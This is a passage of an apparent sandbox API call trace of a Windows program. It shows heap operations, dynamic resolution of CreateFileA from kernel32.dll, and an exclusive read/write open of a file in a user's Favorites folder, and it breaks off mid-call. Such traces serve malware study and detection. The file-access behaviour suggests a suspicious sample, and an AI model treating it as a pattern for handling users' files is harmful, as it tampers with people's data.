HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0180.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0180.693] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0180.694] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.694] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0180.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0180.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0180.694] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0180.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0180.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0180.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0180.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0180.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0180.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0180.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0180.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd978 [0180.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0180.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0180.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0180.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0180.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0180.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0180.695] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0180.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0180.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0180.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0180.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0180.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0180.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0180.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0180.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0180.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0180.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0180.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0180.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0180.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0180.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0180.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0180.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0180.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0180.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0180.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0180.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0180.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0180.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0180.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0180.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0180.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0180.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0180.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0180.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0180.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0180.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0180.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0180.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0180.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0180.698] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0180.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0180.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0180.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0180.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0180.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0180.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0180.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0180.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0180.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0180.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0180.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0180.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0180.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0180.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0180.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0180.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0180.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0180.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.701] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0180.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9c70 [0180.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9c70, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0180.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.702] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0180.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0180.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0180.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0180.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9c70 [0180.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9c70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0180.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0180.702] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0180.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0180.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0180.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0180.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0180.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0180.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url", cchWideChar=79, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 79 [0180.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4f) returned 0x923b28 [0180.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url", cchWideChar=79, lpMultiByteStr=0x923b28, cbMultiByte=79, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url", lpUsedDefaultChar=0x0) returned 79 [0180.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0180.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0180.704] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 